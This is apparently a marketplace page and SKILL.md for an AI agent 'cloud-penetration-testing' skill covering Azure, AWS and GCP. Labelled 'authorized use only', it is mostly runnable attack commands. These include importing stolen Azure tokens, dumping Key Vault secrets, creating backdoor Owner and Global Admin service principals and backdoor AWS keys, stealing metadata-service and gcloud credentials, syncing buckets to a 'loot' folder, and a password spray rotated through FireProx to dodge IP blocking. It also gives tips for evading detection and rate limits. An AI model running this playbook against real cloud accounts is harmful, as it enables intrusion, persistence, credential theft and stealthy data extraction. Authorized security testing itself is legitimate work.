cloud-penetration-testing
Conduct comprehensive security assessments of cloud infrastructure across Microsoft Azure, Amazon Web Services (AWS), and Google Cloud Platform (GCP).
About this skill
This skill enables an AI agent to conduct comprehensive security assessments of cloud infrastructure across major platforms including Microsoft Azure, Amazon Web Services (AWS), and Google Cloud Platform (GCP). It covers a full range of penetration testing activities, from initial reconnaissance and authentication testing to resource enumeration, privilege escalation attempts, data extraction, and persistence techniques. The skill is designed for authorized use only, emphasizing ethical hacking, defensive validation, and controlled educational environments to identify vulnerabilities and misconfigurations.
Best use case
Ethical hacking, cloud security auditing, vulnerability assessment, red teaming exercises, validating security controls, security posture assessment, controlled security research, educational cybersecurity training.
Conduct comprehensive security assessments of cloud infrastructure across Microsoft Azure, Amazon Web Services (AWS), and Google Cloud Platform (GCP).
Detailed reports outlining identified vulnerabilities, misconfigurations, potential privilege escalation paths, data exposure risks, and recommended remediation steps across the assessed cloud platforms. The outcome will help improve the security posture of the targeted cloud infrastructure.
Practical example
Example input
Agent, I need to perform an authorized penetration test on our AWS development environment. Focus on identifying misconfigured S3 buckets and potential IAM role privilege escalation paths for account ID `123456789012`.
Example output
Understood. Initiating `cloud-penetration-testing` skill for AWS account `123456789012` within the specified development environment. I will focus on S3 bucket configurations and IAM privilege escalation. Please confirm all necessary permissions and authorization for this test are in place. I will provide a detailed report upon completion of the assessment.
When to use this skill
- When an authorized user requests a security assessment of a specified cloud environment (AWS, Azure, or GCP) to identify vulnerabilities, test defenses, or validate compliance. The agent should be explicitly instructed to perform a penetration test within a predefined scope and with proper authorization.
When not to use this skill
- Under any unauthorized circumstances, on systems or accounts not explicitly approved for testing, for malicious activities, without explicit written consent from the asset owner, or outside of a clearly defined scope and ethical guidelines.
Installation
Claude Code / Cursor / Codex
Manual Installation
- Download SKILL.md from GitHub
- Place it in
.claude/skills/cloud-penetration-testing/SKILL.mdinside your project - Restart your AI agent — it will auto-discover the skill
How cloud-penetration-testing Compares
| Feature / Agent | cloud-penetration-testing | Standard Approach |
|---|---|---|
| Platform Support | Claude | Limited / Varies |
| Context Awareness | High | Baseline |
| Installation Complexity | easy | N/A |
Frequently Asked Questions
What does this skill do?
Conduct comprehensive security assessments of cloud infrastructure across Microsoft Azure, Amazon Web Services (AWS), and Google Cloud Platform (GCP).
Which AI agents support this skill?
This skill is designed for Claude.
How difficult is it to install?
The installation complexity is rated as easy. You can find the installation instructions above.
Where can I find the source code?
You can find the source code on GitHub using the link provided at the top of the page.
Related Guides
AI Agents for Coding
Browse AI agent skills for coding, debugging, testing, refactoring, code review, and developer workflows across Claude, Cursor, and Codex.
Best AI Skills for Claude
Explore the best AI skills for Claude and Claude Code across coding, research, workflow automation, documentation, and agent operations.
AI Agents for Startups
Explore AI agent skills for startup validation, product research, growth experiments, documentation, and fast execution with small teams.
SKILL.md Source
> AUTHORIZED USE ONLY: Use this skill only for authorized security assessments, defensive validation, or controlled educational environments.
<!-- security-allowlist: curl-pipe-bash -->
# Cloud Penetration Testing
## Purpose
Conduct comprehensive security assessments of cloud infrastructure across Microsoft Azure, Amazon Web Services (AWS), and Google Cloud Platform (GCP). This skill covers reconnaissance, authentication testing, resource enumeration, privilege escalation, data extraction, and persistence techniques for authorized cloud security engagements.
## Prerequisites
### Required Tools
```bash
# Azure tools
Install-Module -Name Az -AllowClobber -Force
Install-Module -Name MSOnline -Force
Install-Module -Name AzureAD -Force
# AWS CLI
curl "https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip" -o "awscliv2.zip"
unzip awscliv2.zip && sudo ./aws/install
# GCP CLI
curl https://sdk.cloud.google.com | bash
gcloud init
# Additional tools
pip install scoutsuite pacu
```
### Required Knowledge
- Cloud architecture fundamentals
- Identity and Access Management (IAM)
- API authentication mechanisms
- DevOps and automation concepts
### Required Access
- Written authorization for testing
- Test credentials or access tokens
- Defined scope and rules of engagement
## Outputs and Deliverables
1. **Cloud Security Assessment Report** - Comprehensive findings and risk ratings
2. **Resource Inventory** - Enumerated services, storage, and compute instances
3. **Credential Findings** - Exposed secrets, keys, and misconfigurations
4. **Remediation Recommendations** - Hardening guidance per platform
## Core Workflow
### Phase 1: Reconnaissance
Gather initial information about target cloud presence:
```bash
# Azure: Get federation info
curl "https://login.microsoftonline.com/getuserrealm.srf?login=user@target.com&xml=1"
# Azure: Get Tenant ID
curl "https://login.microsoftonline.com/target.com/v2.0/.well-known/openid-configuration"
# Enumerate cloud resources by company name
python3 cloud_enum.py -k targetcompany
# Check IP against cloud providers
cat ips.txt | python3 ip2provider.py
```
### Phase 2: Azure Authentication
Authenticate to Azure environments:
```powershell
# Az PowerShell Module
Import-Module Az
Connect-AzAccount
# With credentials (may bypass MFA)
$credential = Get-Credential
Connect-AzAccount -Credential $credential
# Import stolen context
Import-AzContext -Profile 'C:\Temp\StolenToken.json'
# Export context for persistence
Save-AzContext -Path C:\Temp\AzureAccessToken.json
# MSOnline Module
Import-Module MSOnline
Connect-MsolService
```
### Phase 3: Azure Enumeration
Discover Azure resources and permissions:
```powershell
# List contexts and subscriptions
Get-AzContext -ListAvailable
Get-AzSubscription
# Current user role assignments
Get-AzRoleAssignment
# List resources
Get-AzResource
Get-AzResourceGroup
# Storage accounts
Get-AzStorageAccount
# Web applications
Get-AzWebApp
# SQL Servers and databases
Get-AzSQLServer
Get-AzSqlDatabase -ServerName $Server -ResourceGroupName $RG
# Virtual machines
Get-AzVM
$vm = Get-AzVM -Name "VMName"
$vm.OSProfile
# List all users
Get-MSolUser -All
# List all groups
Get-MSolGroup -All
# Global Admins
Get-MsolRole -RoleName "Company Administrator"
Get-MSolGroupMember -GroupObjectId $GUID
# Service Principals
Get-MsolServicePrincipal
```
### Phase 4: Azure Exploitation
Exploit Azure misconfigurations:
```powershell
# Search user attributes for passwords
$users = Get-MsolUser -All
foreach($user in $users){
$props = @()
$user | Get-Member | foreach-object{$props+=$_.Name}
foreach($prop in $props){
if($user.$prop -like "*password*"){
Write-Output ("[*]" + $user.UserPrincipalName + "[" + $prop + "]" + " : " + $user.$prop)
}
}
}
# Execute commands on VMs
Invoke-AzVMRunCommand -ResourceGroupName $RG -VMName $VM -CommandId RunPowerShellScript -ScriptPath ./script.ps1
# Extract VM UserData
$vms = Get-AzVM
$vms.UserData
# Dump Key Vault secrets
az keyvault list --query '[].name' --output tsv
az keyvault set-policy --name <vault> --upn <user> --secret-permissions get list
az keyvault secret list --vault-name <vault> --query '[].id' --output tsv
az keyvault secret show --id <URI>
```
### Phase 5: Azure Persistence
Establish persistence in Azure:
```powershell
# Create backdoor service principal
$spn = New-AzAdServicePrincipal -DisplayName "WebService" -Role Owner
$BSTR = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($spn.Secret)
$UnsecureSecret = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($BSTR)
# Add service principal to Global Admin
$sp = Get-MsolServicePrincipal -AppPrincipalId <AppID>
$role = Get-MsolRole -RoleName "Company Administrator"
Add-MsolRoleMember -RoleObjectId $role.ObjectId -RoleMemberType ServicePrincipal -RoleMemberObjectId $sp.ObjectId
# Login as service principal
$cred = Get-Credential # AppID as username, secret as password
Connect-AzAccount -Credential $cred -Tenant "tenant-id" -ServicePrincipal
# Create new admin user via CLI
az ad user create --display-name <name> --password <pass> --user-principal-name <upn>
```
### Phase 6: AWS Authentication
Authenticate to AWS environments:
```bash
# Configure AWS CLI
aws configure
# Enter: Access Key ID, Secret Access Key, Region, Output format
# Use specific profile
aws configure --profile target
# Test credentials
aws sts get-caller-identity
```
### Phase 7: AWS Enumeration
Discover AWS resources:
```bash
# Account information
aws sts get-caller-identity
aws iam list-users
aws iam list-roles
# S3 Buckets
aws s3 ls
aws s3 ls s3://bucket-name/
aws s3 sync s3://bucket-name ./local-dir
# EC2 Instances
aws ec2 describe-instances
# RDS Databases
aws rds describe-db-instances --region us-east-1
# Lambda Functions
aws lambda list-functions --region us-east-1
aws lambda get-function --function-name <name>
# EKS Clusters
aws eks list-clusters --region us-east-1
# Networking
aws ec2 describe-subnets
aws ec2 describe-security-groups --group-ids <sg-id>
aws directconnect describe-connections
```
### Phase 8: AWS Exploitation
Exploit AWS misconfigurations:
```bash
# Check for public RDS snapshots
aws rds describe-db-snapshots --snapshot-type manual --query=DBSnapshots[*].DBSnapshotIdentifier
aws rds describe-db-snapshot-attributes --db-snapshot-identifier <id>
# AttributeValues = "all" means publicly accessible
# Extract Lambda environment variables (may contain secrets)
aws lambda get-function --function-name <name> | jq '.Configuration.Environment'
# Access metadata service (from compromised EC2)
curl http://169.254.169.254/latest/meta-data/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
# IMDSv2 access
TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl http://169.254.169.254/latest/meta-data/profile -H "X-aws-ec2-metadata-token: $TOKEN"
```
### Phase 9: AWS Persistence
Establish persistence in AWS:
```bash
# List existing access keys
aws iam list-access-keys --user-name <username>
# Create backdoor access key
aws iam create-access-key --user-name <username>
# Get all EC2 public IPs
for region in $(cat regions.txt); do
aws ec2 describe-instances --query=Reservations[].Instances[].PublicIpAddress --region $region | jq -r '.[]'
done
```
### Phase 10: GCP Enumeration
Discover GCP resources:
```bash
# Authentication
gcloud auth login
gcloud auth activate-service-account --key-file creds.json
gcloud auth list
# Account information
gcloud config list
gcloud organizations list
gcloud projects list
# IAM Policies
gcloud organizations get-iam-policy <org-id>
gcloud projects get-iam-policy <project-id>
# Enabled services
gcloud services list
# Source code repos
gcloud source repos list
gcloud source repos clone <repo>
# Compute instances
gcloud compute instances list
gcloud beta compute ssh --zone "region" "instance" --project "project"
# Storage buckets
gsutil ls
gsutil ls -r gs://bucket-name
gsutil cp gs://bucket/file ./local
# SQL instances
gcloud sql instances list
gcloud sql databases list --instance <id>
# Kubernetes
gcloud container clusters list
gcloud container clusters get-credentials <cluster> --region <region>
kubectl cluster-info
```
### Phase 11: GCP Exploitation
Exploit GCP misconfigurations:
```bash
# Get metadata service data
curl "http://metadata.google.internal/computeMetadata/v1/?recursive=true&alt=text" -H "Metadata-Flavor: Google"
# Check access scopes
curl http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes -H 'Metadata-Flavor:Google'
# Decrypt data with keyring
gcloud kms decrypt --ciphertext-file=encrypted.enc --plaintext-file=out.txt --key <key> --keyring <keyring> --location global
# Serverless function analysis
gcloud functions list
gcloud functions describe <name>
gcloud functions logs read <name> --limit 100
# Find stored credentials
sudo find /home -name "credentials.db"
sudo cp -r /home/user/.config/gcloud ~/.config
gcloud auth list
```
## Quick Reference
### Azure Key Commands
| Action | Command |
|--------|---------|
| Login | `Connect-AzAccount` |
| List subscriptions | `Get-AzSubscription` |
| List users | `Get-MsolUser -All` |
| List groups | `Get-MsolGroup -All` |
| Current roles | `Get-AzRoleAssignment` |
| List VMs | `Get-AzVM` |
| List storage | `Get-AzStorageAccount` |
| Key Vault secrets | `az keyvault secret list --vault-name <name>` |
### AWS Key Commands
| Action | Command |
|--------|---------|
| Configure | `aws configure` |
| Caller identity | `aws sts get-caller-identity` |
| List users | `aws iam list-users` |
| List S3 buckets | `aws s3 ls` |
| List EC2 | `aws ec2 describe-instances` |
| List Lambda | `aws lambda list-functions` |
| Metadata | `curl http://169.254.169.254/latest/meta-data/` |
### GCP Key Commands
| Action | Command |
|--------|---------|
| Login | `gcloud auth login` |
| List projects | `gcloud projects list` |
| List instances | `gcloud compute instances list` |
| List buckets | `gsutil ls` |
| List clusters | `gcloud container clusters list` |
| IAM policy | `gcloud projects get-iam-policy <project>` |
| Metadata | `curl -H "Metadata-Flavor: Google" http://metadata.google.internal/...` |
### Metadata Service URLs
| Provider | URL |
|----------|-----|
| AWS | `http://169.254.169.254/latest/meta-data/` |
| Azure | `http://169.254.169.254/metadata/instance?api-version=2018-02-01` |
| GCP | `http://metadata.google.internal/computeMetadata/v1/` |
### Useful Tools
| Tool | Purpose |
|------|---------|
| ScoutSuite | Multi-cloud security auditing |
| Pacu | AWS exploitation framework |
| AzureHound | Azure AD attack path mapping |
| ROADTools | Azure AD enumeration |
| WeirdAAL | AWS service enumeration |
| MicroBurst | Azure security assessment |
| PowerZure | Azure post-exploitation |
## Constraints and Limitations
### Legal Requirements
- Only test with explicit written authorization
- Respect scope boundaries between cloud accounts
- Do not access production customer data
- Document all testing activities
### Technical Limitations
- MFA may prevent credential-based attacks
- Conditional Access policies may restrict access
- CloudTrail/Activity Logs record all API calls
- Some resources require specific regional access
### Detection Considerations
- Cloud providers log all API activity
- Unusual access patterns trigger alerts
- Use slow, deliberate enumeration
- Consider GuardDuty, Security Center, Cloud Armor
## Examples
### Example 1: Azure Password Spray
**Scenario:** Test Azure AD password policy
```powershell
# Using MSOLSpray with FireProx for IP rotation
# First create FireProx endpoint
python fire.py --access_key <key> --secret_access_key <secret> --region us-east-1 --url https://login.microsoft.com --command create
# Spray passwords
Import-Module .\MSOLSpray.ps1
Invoke-MSOLSpray -UserList .\users.txt -Password "Spring2024!" -URL https://<api-gateway>.execute-api.us-east-1.amazonaws.com/fireprox
```
### Example 2: AWS S3 Bucket Enumeration
**Scenario:** Find and access misconfigured S3 buckets
```bash
# List all buckets
aws s3 ls | awk '{print $3}' > buckets.txt
# Check each bucket for contents
while read bucket; do
echo "Checking: $bucket"
aws s3 ls s3://$bucket 2>/dev/null
done < buckets.txt
# Download interesting bucket
aws s3 sync s3://misconfigured-bucket ./loot/
```
### Example 3: GCP Service Account Compromise
**Scenario:** Pivot using compromised service account
```bash
# Authenticate with service account key
gcloud auth activate-service-account --key-file compromised-sa.json
# List accessible projects
gcloud projects list
# Enumerate compute instances
gcloud compute instances list --project target-project
# Check for SSH keys in metadata
gcloud compute project-info describe --project target-project | grep ssh
# SSH to instance
gcloud beta compute ssh instance-name --zone us-central1-a --project target-project
```
## Troubleshooting
| Issue | Solutions |
|-------|-----------|
| Authentication failures | Verify credentials; check MFA; ensure correct tenant/project; try alternative auth methods |
| Permission denied | List current roles; try different resources; check resource policies; verify region |
| Metadata service blocked | Check IMDSv2 (AWS); verify instance role; check firewall for 169.254.169.254 |
| Rate limiting | Add delays; spread across regions; use multiple credentials; focus on high-value targets |
## References
- [Advanced Cloud Scripts](references/advanced-cloud-scripts.md) - Azure Automation runbooks, Function Apps enumeration, AWS data exfiltration, GCP advanced exploitation
## When to Use
This skill is applicable to execute the workflow or actions described in the overview.Related Skills
mtls-configuration
Configure mutual TLS (mTLS) for zero-trust service-to-service communication. Use when implementing zero-trust networking, certificate management, or securing internal service communication.
mobile-security-coder
Expert in secure mobile coding practices specializing in input validation, WebView security, and mobile-specific security patterns.
malware-analyst
Expert malware analyst specializing in defensive malware research, threat intelligence, and incident response. Masters sandbox analysis, behavioral analysis, and malware family identification.
linux-privilege-escalation
Execute systematic privilege escalation assessments on Linux systems to identify and exploit misconfigurations, vulnerable services, and security weaknesses that allow elevation from low-privilege user access to root-level control.
laravel-security-audit
Security auditor for Laravel applications. Analyzes code for vulnerabilities, misconfigurations, and insecure practices using OWASP standards and Laravel security best practices.
frontend-security-coder
Expert in secure frontend coding practices specializing in XSS prevention, output sanitization, and client-side security patterns.
frontend-mobile-security-xss-scan
You are a frontend security specialist focusing on Cross-Site Scripting (XSS) vulnerability detection and prevention. Analyze React, Vue, Angular, and vanilla JavaScript code to identify injection poi
differential-review
Security-focused code review for PRs, commits, and diffs.
dependency-management-deps-audit
You are a dependency security expert specializing in vulnerability scanning, license compliance, and supply chain security. Analyze project dependencies for known vulnerabilities, licensing issues, outdated packages, and provide actionable remediation strategies.
azure-security-keyvault-keys-java
Azure Key Vault Keys Java SDK for cryptographic key management. Use when creating, managing, or using RSA/EC keys, performing encrypt/decrypt/sign/verify operations, or working with HSM-backed keys.
azure-security-keyvault-keys-dotnet
Azure Key Vault Keys SDK for .NET. Client library for managing cryptographic keys in Azure Key Vault and Managed HSM. Use for key creation, rotation, encryption, decryption, signing, and verification.
azure-keyvault-py
Azure Key Vault SDK for Python. Use for secrets, keys, and certificates management with secure storage.